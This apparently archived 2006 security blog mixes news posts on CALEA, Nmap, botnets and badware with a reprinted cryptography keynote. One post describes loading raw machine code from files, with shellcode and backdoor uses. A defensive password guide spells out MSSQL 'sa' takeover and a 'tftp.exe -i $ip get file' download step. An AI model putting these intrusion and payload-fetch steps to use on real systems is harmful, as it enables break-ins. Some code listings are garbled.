Tuesday, January 31, 2006

This Is Amazing

Thinks the federal government is too intrusive? You ain't seen nothing
yet. An FCC mandate will require that all hardware and software have a
wiretap backdoor that allows the government to tap into all your

The mandate expands the Communications Assistance for Law Enforcement
Act (CALEA), and requires that every piece of hardware and software
sold include the backdoor.

The rule isn't yet final, but once it is, all vendors will have 18
months to comply. And in fact, says Brad Templeton, chairman of the
Electronic Frontier Foundation (EFF), some router makers already
include such a backdoor. So your hardware may be vulnerable.

There are several problems with this rule. First is the obvious massive
intrusion into all of our privacy. Second, says Templeton, is the way
that the rule will stifle innovation. According to the Washington Post,
he claims that the rule will "require that people get permission to
innovate" would create "regulatory barriers to entry." He adds "The FBI
gets veto on new companies."

The final problem is that if all hardware and software has a backdoor,
it's an open invitation to hackers. So we may be faced with a
double-whammy: The feds and hackers working their way into our systems.

The EFF, the Electronic Privacy Information Center (EPIC), the COMPTEL
association of communications service providers, and the American Civil
Liberties Union filed a brief last week with the U.S. Court of Appeals
for the District of Columbia Circuit to try and stop the FCC. Here's
hoping they win.

Geting Close To Nmap 4.0 ...

new nmap born. (version 3.9999)
Now we are getting very close to the big 4.0 release.


I am pleased to announce the release of Nmap 3.9999. From the version
number, you can probably guess that we are getting very close to the
big 4.0 release. But this version has many changes, so I wanted to
give you a chance to fully test it out before releasing 4.0. Please
let me know if you find any problems in the next few days.

Now back to the changes -- I think you'll like these. One new feature
is runtime integration, which allows you to press [enter] at any time
for a status report with an estimated completion time for the current
scan. Another is asynchronous DNS, which speeds up large network
scans as Nmap doesn't have to resolve each IP serially using the
(slow) host resolver anymore. Windows users may appreciate that there
is now an executable installer -- nmap-3.9999-setup.exe, which takes
care of things like WinPcap and the registry performance improvements
for you. The traditional Windows .zip file format is still available
as well. The version detection database has been updated with all
remaining 2005 service submissions. It now contains 3,153 signatures
for 381 service protocols. Please keep those submissions coming in
'06! Nmap has some new options, such as --max-retries and --badsum.
And there is more in the CHANGELOG below.

Source : http://seclists.org/lists/nmap-hackers/200...n-Mar/0000.html

Monday, January 30, 2006

Cross Site Cooking

There are three fairly interesting flaws in how HTTP cookies were
designed and later implemented in various browsers; these shortcomings
make it possible (and alarmingly easy) for malicious sites to plant
spoofed cookies that will be relayed by unsuspecting visitors to
legitimate, third-party servers.


Sunday, January 29, 2006

Cyber Crime Strides In Lockstep With Security

Information Security made great strides last year.

Sadly, so did cyber crime.

In the U.S. ? according to a recent FBI study ? almost 90 per cent
of firms experienced computer attacks last year despite the use of
security software.

So what happened in 2005?

In a year when rootkits went mainstream and malware went criminal,
information security improved.

There was no global pandemic like the Slammer or Blaster worm
juggernaut. There was no malware with a replication magnitude of the
order of Code Red, Slammer, Nimda, or the Iloveyou virus. With the
notable exception of PHP worms, even the Linux side had fewer popular
viruses and worms.

Patching got easier. Not only did more and more sophisticated patch
management tools arrive from every sector, but there were fewer patches
to deploy. Administrators got better at blocking hackers and malware.
And end users don't click on every file attachment they receive.

But security onslaughts attain greater significance as the year saw the
metamorphosis of cyber malice into a highly organized and sophisticated
international crime syndicate, where the likes of ?phishing? and
?spamming? have gone through drastic evolution.

Eighty-seven per cent of the more than 2,000 public and private
enterprises that took part in the FBI survey said that they had
undergone one or the other kind of security attack. Virus, spyware and
adware top the list where a significant amount of businesses faced
systems and data sabotage. One third of the companies detected port
scans of their systems, a method used by attackers to identify
vulnerable PCs to sneak in, the survey said.

A staggering 98 per cent of survey respondents said they used antivirus
software, of which nearly 84 per cent still suffered a virus attack.

According to U.S.?based security and communications software vendor
MicroWorld Technologies Inc. in Farmington Hills, Mich., many antivirus
software products fail to prevent virus attacks because they work in a
reactive way with known virus signatures, and hence cannot take on
newer threats. Enterprises must revaluate the kind of technology and
effectiveness of many leading antivirus and security software they use.

The stuff that is getting by our defenses is more dangerous: Malware
went criminal. Most of today's malware exists to steal confidential
information, send spam, or steal identities. Now, malware is getting
harder to remove, hiding better, and contains more tricks and exploits
than ever.

IT managers and system administrators reported spyware and viruses were
the most common problem, followed by port scans, sabotage of data or
networks, and adult pornography. While not necessarily illegal, adult
pornography is against the policy of most organizations, the study

More than 50 per cent of hacking attempts came from within the U.S. and
from China, as many organizations were able to trace where intrusion
attempts originated. But hackers are using computers that are under
their control but located in other countries, combined with the use of
proxies to make detection more difficult.

The FBI said a Romanian hacker could use a proxy computer in China to
gain access to a compromised computer in the U.S., leading to a false
conclusion that the attack originated in the U.S.

Antivirus software is widely used, and most organizations also have
firewalls in place, the survey said. But 44 per cent reported that
intrusions came from within their own organizations, and "this is a
strong indicator that internal controls are extremely important and
should not be underemphasized while concentrating efforts on deterring
outside hackers," the FBI said.

Nearly two-thirds of those surveyed had implemented event logging on
their network, a measure the FBI said is a crucial element in tracking
crime. And half of those stored the logs on a remote protected server.

Saturday, January 28, 2006

Microsoft Readies Two-way Firewall For Vista

For its upcoming Windows Vista operating system, Microsoft is readying
a new, highly configurable firewall designed to give administrators
much greater control over which applications can run on the systems
they manage.

After just over a month of testing by users of Microsoft's Community
Technology Preview (CTP), the firewall is "very much on track" to be in
the final Vista release scheduled for later this year, and the company
is considering adding a similar feature for its consumer users, said
Austin Wilson, a director in Microsoft's Windows client group.

More here Vista two way firewall

Good Worms Back On The Agenda

ARLINGTON, Virginia -- A researcher has reopened the subject of
beneficial worms, arguing that the capabilities of self-spreading code
could perform better penetration testing inside networks, turning
vulnerable systems into distributed scanners.

The worms, dubbed nematodes after the parasitic worm used to kill pests
in gardens, could give security administrators the ability to scan
machines inside a corporate network but beyond a local subnet, David
Aitel, principal researcher of security firm Immunity, said at the
Black Hat Federal conference.

"Rather than buy a scanning system for every segment of your network,
you can use nematodes to turn every host into a scanner," he said
during an interview with SecurityFocus. "You'll be able to see into the
shadow organization of a network--you find worms on machines and you
don't know how they got there."

read on

The Five Great Inventions of Twentieth Century Cryptography

By William Hugh Murray


The Five Great Inventions of Twentieth Century Cryptography William Hugh Murray
[This talk was presented as the keynote address at the 1994 RSA Security Conference, Redwood City, CA]

Two years ago I opened the first of these conferences. Jim Bidzos invited me to "kick it off;" nothing so formal as a "keynote." While I wore this same suit, I just sort of got up here to shoot the breeze with a few of my friends and colleagues. No notes, just sort of "off-the-cuff." He did not even tell me how long I could talk. As far as I know there were no reporters present; nothing that I said got me in trouble. After the morning session was over, Jim hosted a lunch for some of the speakers and panelists. Whit Diffie sat beside me, with his notes, and began to quiz me on my sources and authorities for my comments. He even told me that some of my best stories were apocryphal (though he conceded me the points that I made with them). Well, I see the same friends, but there are far more colleagues. The program is more formal, Diffie still has his pad and pencil, the press is here, my remarks are styled as a "keynote," they are sufficiently arguable that I need to choose my words very carefully, and I have a fixed time to end. Prudence suggests that I use notes. Introduction Cryptography, the art of secret communication, is almost as old as writing. Indeed, it has been suggested that, at least for a while, writing itself was a relative secret. Certainly it was esoteric and its use was reserved to an initiated elite. Cryptography and recording and communicating technologies have played leap frog through the pages of history. It is my thesis that both have changed so radically during the nineteenth and twentieth centuries as to constitute a new era. On the recording and communicating side we have photography, telegraphy, telephony, radio, phonography, cinema, television, and telecommunications.hy, telephony, radio, cinema, television, and the computer. Collectively, and even individually, these technologies constitute a dramatic change in our ability to make a mark across time and space. We have seen a similar advance in our ability to conceal those records and messages from all but a chosen few. Modern cryptography has its origins between the two great wars of the twentieth century. .It was driven as much by the use of radio on the battlefield as by any other single influence, but there are an infinite number of important recording and communicating applications that simply cannot be done in clear text. While more sparingly used and less well known, the advances in cryptography have been no less dramatic than those in recording and communications. I propose to consider five inventions of the twentieth century that have defined modern cryptography and that set it apart from ancient or traditional cryptography. The impact of these technologies has been to simplify the use of codes, reduce their cost, and increase by orders of magnitude the cost to a cryptanalyst of recovering information protected by the codes. What constitutes an invention or sets it apart from other inventions is somewhat arbitrary. Some of the inventions that I propose to discuss could be considered as a group of other inventions; the members of the group might or might not be significant by themselves. I have limited myself to a discussion of inventions rather than accomplishments, and to cryptography rather than to cryptanalysis. Many of the accomplishments of the century have been in cryptanalysis and may have been greater than the inventions in cryptography. However, greatness is in the eye of the beholder. Certainly all the inventions have not been limited to cryptography. For example, if cryptanalysts did not invent the modern computer, they certainly gave it a major boost. They have lived to see the advantage that it provides shift, with its scale, from them to the cryptographer. Automated Encoding and Decoding Modern cryptography begins in 1917 with the invention by Gilbert S. Vernam, an employee of the American Telephone & Telegraph Company, of the Vernam System. Vernam used two paper tape readers, one for the message and the other for the key. He added the two (bit-wise and modulo 2) to produce the ciphertext. Moreover, he used the standard information technology of his day to automate the encoding and decoding of information. Modern cryptography is automatic. Translation from plaintext to ciphertext and back again is performed automatically, that is by a machine or automaton. While there may be a separate step, the conversion from one code to the other is done by a machine rather than by a person. Today that conversion can be done by almost any single user computer. With appropriate controls and for some applications it can be done in a multi-user computer. Before computers, this encoding was done in special purpose machines. The Enigma and Purple machines were both early and famous examples of such machines. The requirement to manually convert from natural language to secret codes has always been a limitation. It tended to limit both the amount of traffic encrypted and the complexity of the encoding schemes used. Therefore, encryption machines of any kind increase the complexity and effectiveness of the codes available. At one level, the modern computer can be viewed as a general purpose code conversion machine. That is, it converts information called input into a new representation called output. The relationship between the input and the output can be simple or complex, obvious or obscure, public or secret, and reversible or irreversible. If the conversion is complex, obscure, secret, and reversible, then the computer can be viewed as an encryption machine. But for want of a small amount of readily available software, all of the hundred million general purpose computers in the world are encryption engines of immense power. At some price in performance, the relationship between input and output can be arbitrarily complex and obscure and thus arbitrarily effective in concealing the meaning of the output. The cost of computer performance has been falling steadily and rapidly for fifty years. It has now become so cheap that most capacity is not used for the convenience of having it ready when it is wanted. The result is that the use of secret codes can be viewed as almost free. So cheap is automatic coding and encoding that some applications do it by default and globally, concealing it completely from the user. Since the difference in cost between public codes and secret codes is vanishing and can be paid in a currency, computer cycles, that might otherwise be wasted, secret codes can be used by default. Independent Long Key Variable The major weakness of Vernam's system was that it required so much key material. This was compensated for by Lyman Morehouse who used two key tapes of 1000 and 999 characters, about eight feet each in length, in combination to produce an effective key tape of 999,000 characters, effectively 8000 feet in length. Morehouse had used a long key. Modern cryptography is tailored to a particular use by a key variable, or simply a key. The key is a large integer that tailors the behavior of the standard algorithm and makes it generate a cipher that is specific to that number. The requirement for secrecy is limited to this number. The problem of protecting the data reduces to the simpler one of protecting the key. Access to the cleartext requires access to the combination of the ciphertext, the base mechanism, usually a computer and a program, and the key. Since the rest are readily available, the efficiency of any use depends upon the fact that it is more expensive or difficult to obtain the key than to obtain the protected data by other means. All other things being equal, the longer the key, the more secure the mechanism. Key length is a trade off against the complexity and the secrecy of the algorithm. The longer the key, the simpler and more obvious can be the mechanism or algorithm. If the key is as long as the message, statistically random in appearance, and used only once (one-time pad), then such a simple and obvious mechanism as modulo addition will still provide effective security. For practical reasons, short keys and more complex mechanisms are preferred. Complexity Based Cryptography (The Data Encryption Standard) In May 1973 the US National Bureau of Standards advertised in the Federal Register for a proposal for an encryption mechanism to be employed as a standard mechanism for all of the needs of the civilian sectors of the government. The ad stated that the successful proposal would be for a mechanism that would be secure for at least five years in spite of the fact that the mechanism would be public and published. The resulting Data Encryption Standard was proposed by the IBM Corporation. It was invented by a team led by Walter Tuchman and was based upon a concept originated by Horst Feistel of IBM's Yorktown Research Laboratory. This mechanism, which can be implemented on a chip and completely described in a few 8.5"X11'' pages, changed the nature of cryptography forever. The security of modern encryption mechanisms like the DES is rooted in their complexity rather than in their secrecy. While traditional encryption relied upon the secrecy of the mechanism to conceal the meaning of the message, these modern mechanisms employ standard and public algorithms. These mechanisms are standard in the sense that they are of known strength or have a known cost of attack. However, the trade-off is that their effectiveness can not, must not, depend upon their secrecy. Rather, it relies upon the complexity of the mechanism. The complexity of modern ciphers is such that they can be effective even though most of their mechanism is public. The most well known, trusted, and widely used of all modern ciphers is the Data Encryption Standard. Because of the intended breadth and duration of the use of this cipher, the sponsors specified that it should be assumed to be public. Its effectiveness should rely upon the secrecy only of the key (see the next section). It has been public for more than fifteen years, but its effectiveness is such that trying all possible keys with known plain and cipher text is still the cheapest practical attack. [The DES belongs to a class of ciphers known as Feistel ciphers. These ciphers are also known as block product ciphers. They are called block ciphers because they operate on a fixed length block of bits or characters. They are called product ciphers because they employ both substitution and transposition.] Automatic Key Management The same key must exist at both ends of the communication. Historically, keys were distributed by a separate channel or path than the one by which the encrypted traffic passed. The initial distribution and installation of the keys must be done in such a way as not to disclose them to the adversary. When this is done manually, it represents a significant opportunity for the compromise of the system. Because they were attempting to combine cryptography and computing in a novel manner, Tuchman and his team understood this problem very well. The products that they based upon the DES algorithm addressed it, in part, by automating the generation, distribution, installation, storage, control, and timely changing of the keys. Their elegant system is described in two papers published in the IBM Systems Journal Vol. 17(2) pp. 106-125 (1978) and covered by a number of fundamental patents based upon it. [While NSA had automated some key management operations, and while Rosenblum was awarded a patent for a "key distribution center," these were ad hoc. This work is the first that describes and implements a complete and integrated automatic system.] The impact of this concept on the effectiveness, efficiency, and ease of application of modern cryptography is immense. However, it may also the the least understood and appreciated. For example, much of the analysis of the strength of the DES is made in the context of the primitive DES. However, the DES rarely appears as a primitive. Instead it appears in implementations which use it in such a way as to compensate for its inherent limitations. For example, automatic generation of the keys avoids the use of weak or trivial keys. (the DES has four known weak keys and four semiweak keys.) Since automatic key management systems permit so many keys, they also reduce the exposure to "known plaintext" attacks. History suggests that codes are most often broken because the user fails to apply them with the necessary rigor and discipline, particularly when choosing, distributing, and installing keys. Automating of these steps provides much of the necessary discipline and rigor. Automatic key distribution and installation increases the effectiveness by protecting the keys from disclosure during distribution, and by making the system resistant to the insertion of keys known to attackers. When keys are installed manually they become known to the human agent who installs them. He is in a position to provide a copy of the key to others. To the extent that this agent is vulnerable to coercion or bribery, the system is weakened by this knowledge. Therefore, the system may be strengthened by automatic mechanisms which provide the agent with beneficial use of the key without granting him knowledge of it. For example, systems available from IBM and Motorola provide for the key to be distributed in smartcards and automatically installed in the target machine. The key can be encrypted in the smartcard or destroyed by the installation process. In either case, the agent can use it, but cannot copy it or give it to another. Just as the use of automata for encoding and decoding reduces the cost and inconvenience of using secret codes, the use of automata for key management reduces the cost and inconvenience of changing the keys frequently. By changing the key frequently, e.g., for each, file, session, message, or transaction, the value to an adversary of obtaining a key is reduced, and the effectiveness of the mechanism is improved. One way of looking at automated key management is that it increases the effective length of the key, or makes it approach the length of the data protected. Asymmetric Key Cryptography However, even though most of the key management can be automated, most such systems require some prearrangement. In any-to-any communications in a large open population, this requirement can quickly become overwhelming. For example, in a population of two hundred people, the number of key pairs and secret exchanges would be in the thousands with many opportunities for keys to be compromised. Moreover, with traditional keys, the initial distribution of keys must be done in such a way as to maintain their secrecy, practically impossible in a large population. These problems are addressed, in part, by public key, or asymmetric key, cryptography. This mechanism was proposed by Whitfield Diffee, Martin Hellman, and Ralph Merkle. It may be the single most innovative idea in modern cryptography. The best known and most widely used implementation is the RSA algorithm invented by Ronald Rivest, Adi Shamir, and Leonard Adelman. [In this mechanism the key has two parts, only one of which must be kept secret. The two parts have the special property that what is encrypted with one can only be decrypted with the other. One half of the key-pair, called the private key, is kept secret and is used only by its owner. The other half, called the public key, is published and is used by all parties that want to communicate with the private key owner. It can be published and does not need to be distributed secretly. Since the public key, by definition, is available to anyone, then anyone can send a message to the owner that only he can read.] With a minimum of pre-arrangement, this function provides the logical analog of an envelope that can only be opened by one person. The larger the communicating population, and the more hostile the environment, the greater is its advantage over symmetric key cryptography. This concealment from all but the intended recipient is the traditional use of cryptography. However, asymmetric key cryptography has another use. A message encrypted using the private key can be read by anyone with access to the public key, but it could only have been encrypted by the owner of the corresponding private key. This use is analogous to a digital signature. It provides confidence that the message originates where it appears to have originated. Since if even a bit of the message is changed it will not decrypt properly, this mechanism also provides confidence that the message has not been either maliciously or accidentally altered. In part, this is also true as between the two parties to a message that is sent using symmetric key cryptography. That is, the recipient of the message knows with a high degree of confidence that it originated with the other holder of the key; he knows it, but he cannot prove it to another. However, with asymmetric key cryptography, he can demonstrate it to a third party. If the owner of the key pair has acknowledged the public part of the key to the third party, then he cannot plausibly deny any message that can be decrypted with it. [The concept of the digital signature is such a novel concept as to easily qualify as an invention on its own. However, it is so closely bound in origin and literature to asymmetric key cryptography that I elect to simply treat them as one.] These two abstractions, the logical envelope and the logical signature, can be composed so as to synthesize any and all of the controls that we have ever been able to achieve by more traditional means. They can be used for payments, contracts, testaments, and high integrity journals and logs. They provide us with a higher degree of security in an electronic environment than we were ever able to achieve in a paper environment. They provide protection in an open environment that is nearly as high as that which we can achieve in an open one. The Impact of the Great Inventions The impact of these inventions is to provide us with secret codes that are cheap enough to be used by default, and arbitrarily strong. Given assumptions about the quantity of data to be protected, the length of time that it must remain secret, its value to an adversary, and the resources available to the adversary, it is possible to apply modern cryptography in such a way as to be as strong as required. While it is possible to state a problem in such a way as to defy such a solution, it is difficult to identify such a problem in the real world. That is, It is possible to specify so much data to be encrypted under a single key, of such high value and which must remain safe for such a long time that we cannot say with confidence that the mechanism can stand for that time and cost. For example, we cannot say with confidence how to encrypt several hundred gigabytes worth several trillion dollars and keep it safe for a millennium. On the other hand, we are not aware of any real problems that meet such a specification. Put another way, we can always ensure that the cost of obtaining the information by cryptanalysis is higher than the value of the data or the cost of obtaining it by alternative means. While any code can be broken at some cost, modern codes are economically unbreakable, at least in the sense that the cost of doing so can be made to exceed the value of doing it. A very small increase in the cost to the cryptographer can result in astronomical increases in the cost to a potential adversary. Perhaps just as important, these mechanisms are now sufficiently convenient to use, that, within bounds, they can be widely and easily applied. Given that the more data that is encrypted with a single mechanism, the greater the value in breaking it, the more compromising information is available to an adversary, and that the more a mechanism is used the greater the opportunity for a compromising error in its use, we should continue to apply cryptography only to data that can profit from its use. On the other we need never again be inhibited from using it by issues of cost or convenience. Cryptography and Government Policy It should be obvious to a qualified observer that, announcements here to the contrary not withstanding, we are losing the battle for security and privacy in the computerized and networked world. We could have secret codes imbedded in all software of interest for free. This assertion assumes only that all such software is produced by those represented here, who have already paid for licenses and absorbed much of the necessary development cost, and that the cost of a marginal cycle on the desktop approaches zero. That we do not, is the result of ambivalent government policy. While one agency of government has sponsored the use of standard cryptography, another has tried to undermine confidence in those standards. While one agency has asserted that public standards are essential, another has sponsored secret ones, and a third has used public funds to further such secret standards. While one agency has insisted that trusted codes are essential to world prosperity, another has imposed restrictions on their export and undermined confidence in those that are exported. While one agency recognizes that national security depends upon world prosperity, another believes that signals intelligence is more important. Those of you who have seen my comments in Risks, sci.crypt , and the Communications of the ACM, know my position. It is that the prime mover behind all of these initiatives is NSA, that their motive is the preservation of their jobs and power by protecting the efficiency of signals intelligence, that their strategy is to discourage by every means that they can get away with all private and most commercial use of cryptography. That they have infiltrated the departments of State and Commerce and the White House staff, and that they are using the Department of Justice. While they know that they cannot be fully successful, they also know that they do not have to be. Nor is this simply paranoia on my part. It is the only explanation that accounts for all of the government's actions. It also meets the tests proposed by Machiavelli, Willie Sutton and "Deep Throat." While most of the government confesses that cryptography is essential to personal privacy in the modern era, the administration is not prepared to admit that even the current sparse use is consistent with the government's responsibility to preserve public order. Let me stress that the problem is government policy, not public policy and not administration or congressional policy. This policy has been made in secret and has been resistant to public input. It is the policy of the bureaucracy and not of any individuals. I know most of the players in the development of this policy. I know none that are pursuing a personal agenda, like the results, or are proud of their roles in it. They are simply doing the best that they know how in the face of agency momentum, administration consent, and the absence of congressional guidance. However, the momentum behind these policies is such that the good intentions and professionalism of the individuals is not sufficient to resist it. While the administration has aligned itself with the initiatives, it is not their author. While the initiatives have sponsors within the administration, they were here before the administration and they expect to be here when it is gone. They believe that the policy is important and that the administration is not. While some committees of the congress have held hearings on the issues and even decried the arbitrary actions of the bureaucracy, their hearings always conclude with executive sessions with the NSA and no legislative initiatives to curb the excesses. Forgive me a closing political observation not intended to be partisan. This government is too large, over-zealous and under-effective. It is committed to nothing so much as its own survival. It may be too late to influence it, but if it is not influenced, not only will we not enjoy the fruits of modern cryptography, but we may not enjoy those of telecommunications, trade, our labors, or even those of freedom.

Ehrsam, W. F., Matyas, S. M., Meyer, C. H., and Tuchman, W. L., "A Cryptographic Key Management System for Implementing the Data Encryption Standard," IBM Systems Journal Vol. 17(2) pp. 106-125 (1978). Kahn, D., The Codebreakers, Macmillan Co., New York (1967). Matyas, S. M., Meyer, C. H., "Generation, Distribution, and Installation of Cryptographic Keys," IBM Systems Journal Vol. 17(2) pp. 126-137 (1978).

Thursday, January 26, 2006

Kaspersky Boss Debunks Security Myths

Russian antivirus guru Eugene Kaspersky has hit out at some of the myths that cloud what he sees as the real issues facing the IT security industry.

Speaking in Moscow, the head of Kaspersky Lab said companies' own agendas and some well-worn stereotypes about cybercrime stand in the way of reasoned discussion. He also criticized those who put too much faith in statistics which, taken out of context, are often dangerously misleading.

For example, figures for the past year released recently by Computer Economics show the effect of cybercrime has diminished.

But Kaspersky said: "These stats are not complete. This is often just damage to IT infrastructure, not the actual costs."

If the overall economic impact has gone down, it's not because the threat has diminished but because the hackers have become smarter and no longer seek to cause damage in the pursuit of more serious gains--such as data or identity theft and corporate espionage, Kaspersky said.

full story

Wednesday, January 25, 2006

Stopbadware Backed By Google, Lenovo, And Sun

Several academic institutions and major tech companies have teamed up to thwart "badware," a phrase they have coined that encompasses spyware and adware.

Harvard University's Berkman Centre and the Oxford Internet Institute are leading the initiative and have received backing from Google, Lenovo and Sun Microsystems. The new website, StopBadware.org, is promoted as a "Neighborhood Watch" campaign and seeks to "provide reliable, objective information about downloadable applications in order to help consumers to make better choices about what they download on to their computers." The group differs from the large Anti-Spyware Coalition which is backed by Microsoft, Symantec, Yahoo, Computer Associates, AOL, and many others, by attempting to be a more grassroots initiative. StopBadware seeks the involvement of the community by asking for submissions of stories and technical reports.

With so many organizations involved with anti-spyware and anti-adware initiatives, the first question on many reader's minds is what makes this group different - aside from its backing by Internet giant Google, along with Lenovo and Sun. According to their FAQ: "Unlike many of the companies working in the space, our roots are in organizations (.orgs and .edus) with independent traditions, so we won't be afraid to call out badware creators of any size. We're not going to hand down solutions from on high - we want to work with both experts and the broader internet community to define and understand the problem."


Monday, January 23, 2006

Functional Files

Hacked by chrootstrap September 2003

You've probably used function pointers in your C or C++ programs.
Pointers to executable regions of memory, they are tremendously useful
for a huge number of programming tasks. Shared libraries usually are
memory mapped files filled with functions. In this article, we'll take
a look at how you can keep functions in ordinary files and find some
creative uses for this.

The technique of treating functions as ordinary data is sometimes used
in cracking servers and the stored functions are known as shell code.
Many shell code examples involve writing the function in C, compiling
it, disassembling it, reassembling it, and snarfing the machine code
into a C buffer. Well, it needn't be so difficult to just grab some raw
instructions from a C function. The GNU tool, objcopy, makes it as easy
as pie.

To do this we put one function in a file, like this:

void f (void)
asm("mov $1, %eax");
asm("mov $25, %ebx");
asm("int $0x80");

Now we compile it like "gcc -c f.c". Now we have a file, f.o, which in
my case is 680 bytes. Doesn't that seem a little steep for a function
that just exits with a code of 25? If we take a look a look at with
"objdump -d f.o" we see that the actual code inside is as simple as we

0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: b8 01 00 00 00 mov $0x1,%eax
8: bb 19 00 00 00 mov $0x19,%ebx
d: cd 80 int $0x80
f: 5d pop %ebp
10: c3 ret

That's the kind of thing that would be manually cut and pasted into a
.s file, but, we've got a simpler solution: "objcopy f.o -O binary". It
is now just 17 bytes in size -- matching the disassembled code

Now if you wanted it to be shell code you'd copy it into a program and
have the function do something like dup2 to hookup stdin/stdout to a
socket and then exec your way into something interesting. But, that's
not what we're doing here.

Instead, let's keep it in the file and load it for our very own
dynamically loaded function. Let's change the function to make it do
something more interesting, like print out a string:

int f (void *ptr)
int i=0;

while (((char *)ptr)[i] != 0)
asm("mov $4, %eax");
asm("mov $1, %ebx");
asm("mov %0, %%ecx"::"g"(ptr));
asm("mov %0, %%edx"::"g"(i));
asm("int $0x80");
asm("mov %%eax, %0":"=g"(i));
return i;

This function will print the string passed to it and pass back the
string's length. It turns into a miniscule 57 bytes when we run it
through objcopy. Now we make a little program to load it from a file
and execute it:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>

int main (int argc, char **argv)
int fd;
int i;
int (*f) (void *);
struct stat buf;

if (argc < 2) {
printf("Usage: %s FILENAME\n", argv[0]);
if ((fd = open(argv[1], O_RDONLY)) < 0) {
printf("Could not open %s.\n", argv[1]);
if (fstat(fd, &buf)) {
printf("Could not stat %s.\n", argv[1]);
f = malloc(buf.st_size);
i = buf.st_size;
while (i)
i -= read(fd, f, i);
return f("Bink!\n");

To use this, you just pass it the function file's name, e.g. f.o. Note
that you can use any function signature that you want! You can pass a
pointer to a complex struct with function pointers of its own and,
thus, provide callback functions, etc.
You can do all kinds of things with this technique! You can make your
own dynamic library system, you can send and run functions directly
over the network, you can store your program as a collection of
extremely small files, you can modify your program code in place
through mixing and matching the contents of these files, build your own
persistent object system, provide a faster alternative to init, network
bootstrapper, in-place patch framework, etc, etc.

If there is function call formation compatibility among systems, by
abstracting system specific functionality through a passed structure's
function pointers, you could make portions of a program system
independent. In particular, it may be very possible to make your
library's code (network backdoor code, etc) work simultaneously on
Windows and x86 Unix boxen. Depending on the program, you might be able
to write 90% or more of the code this way.

Your function files are also highly portable among similar systems as
they don't contain any linker information. Also, typical dynamic
library loaders are slow! Step through the full process to get to your
function of choice with gdb and you might be surprised. You can save
loads of clock cycles and megabytes of memory by making your own
dynamic function loader. Cool beans!

Saturday, January 21, 2006

Require Complex Passwords

This paper was written because of massive attacks agianst servers and
the construction of huge bot nets!
It is not a practical guidebook to any Operating System or to perfect
security on any Computer.

If you are an Administrator or any Computer owner you do NOT need to be
a security expert to get at least some
security on your home computers or big cluster systems!
There are 5 easy to follow steps that will help to prevent you from
getting hacked or becomeing one of thoose
remote controlled computers!

First off i am going to tell you a little bit about the fascinating
world of Botnets and other very unlikely things that
can happen to your Computers:

-)Getting hacked:
If you are watching out in some internet forums you will be very likely
to see thoose postings "i got hacked"
or "my box got hacked-what do i do now?" but did they really get
hacked? ....Well as far as i know only 3 out
of 10 boxed really got hacked the other ones are just infected with the
real bad stuff.
The main reasons of hacking have changed and in the real world there
are not many real Hackers left!
The real ones are living in the world of the byte and the electron
looking out for the perfect code and all the
knowledge they can gain! Most of the computers that are hacked
today...well they are NOT they just simply got
cracked. But why are people breaking into systems? There are a couple
of answers to this question, but only
one that is for real. Servers get most often cracked by a so called
"haxxor" , this stands out for a kiddy cracker
(in short script kiddys). Theese just hack theyr way into boxes for two
-1) To just be "The ELITE HACKER" that can hack into his best friends
box or
-2) becacause they are part of a so called "Warez Crew".
If the box is hacked for a warez crew it is may running a trojan or
some sort of bot, but definatly a Ftp Deamon
! Theese hacked boxes are so called "Stro" or "Stroz" witch stands out
for a hacked box that is running an ftp deamon
(most used are: Servu, Gene 6, and some use glftp ports for windows)
after theese boxes are hacked and
running some ftp deamon the hacker is very likely to secure the bug
that allowed him to hack the box!
Afterwards the attacker submits an account on the ftp deamon to a so
called "Fillor" that fills the box with warez
in hidden directorys. This can cause massive ammounts of traffic on
hacked maschines (up to some terrabytes
on 100mbit+ servers) because then the complete crew shares the accounts
that have download only rights!

Bots,Botnets and other nasty stuff:
Well this is what will happen most often:
Some cracker writes some worm to spread his bots or if he is skilled
enouph he adds a scan engine to the bot.
Bots, Viruses and Worms spread in nearly the same way skript kiddys
hack boxes to store theyr warez.
If a new public Exploit is released or if the cracker finds a bug that
he is able to use he just takes that code
and writes a scan engine for it. What that means is quite simple: every
computer has an ip adress and a
number of ports (80 http, 21 ftp, ....telnet...tftp....) and most
services on a computer use a default port.
The engine just simply connects to that port and checks if it is open.
If it is the engine checks if the service is
running (i am now taking 1433 known as MS-SQL as my example). This is
the point where it gets tricky
most bugs that allow to execute code are not using any passwords but it
can happen that the service does
as mssql :-) If the service is able to use a password SET IT and CHANGE
THE USERNAME because this
makes it harder to guess the password by Brute force (trying random
combinations) or a dictionairy attack
(the attacker uses a word list with fixed up password combinations) if
the password is guessed you are
very close to be (filtered)! If in a warez crew a scan could look like
this(with standart mssql):
Found: [sa: ] on
now this tells the hacker or the bot that the computer with the ip
adress (also known as localhost
has the username sa set wich stands out for the sql standart user
(sa=Set Administrator)
in this case the bot or haxxor connects to the target on port 1433
(mssql) and enters the username without a password. In regular cases it
or he would only be able to chance the pasword, or add some data to the
but this is for real and i am going to tell ya how it really works
since you need to know your enemy.
The attacker uses an exploit that allows him to do certain prozedure
calls or to execute code (in case of mssql its a call) If a kiddy would
hack sql the standart method of doing so is to call the prozedure
this is a build in feature of mssql that allows to get shell exess
(full acess to CMD also known as MS dos )
now he just uploads his stuff thru the useage of ftp.exe (by the usage
of a script) or by tftp (tftp.exe -i $ip get file )
but there are other interesting ways to upload programms onto boxes
(rcp,debug.exe, inline transfer, iexplore )
After the ftp deamon or bot has been uploaded it just adds itself to
the service list (see it thru net start in cmd)
this is done by c:/file/bad.exe -i then the attacker starts the
programm by "net start servicename"
and the bot or ftp deamon is running. in both cases the attacker or the
bot will secure the security hole it
used to get into the system! (in sql you should delete the following
dlls: xpstar.dll, odsole70.dll, xpsql60.dll, xpsql70.dl, Xplog70.dll
-To create a so called SQL error this error only effects the exploit
not your database)
Most kiddys can not hack theese boxes anymore but some skilled ones or
the real hacker can ...
you see security is just an illuison! there are thousends of bugs like
the one in sql in too many to thell ya know
but if you stick to the following information it will help you to
prevent getting hacked or a bot.
So called bots if they are running on your system will connect to irc
to any server and join a channel where they
get theyr commands (ip ranges that need to be scanned and targets for
DDos attacks)
A botnet that can do a sucessfull ddos need to have minimum of 5 fast
boxes or 100000000000 of slower ones!

After you have read the information about theese little pests and
kiddys i am going to help ya a little bit on your security!
First off: the 5 basics:
-1) Require Complex Passwords
-2) Firewall and Antivirus
-4)Acess logging tools,Brute Force Detection tools

I am going to take you step by step and tell ya what it is all about so
read this carefully
1.) by useing random generated passwords you may not be able to
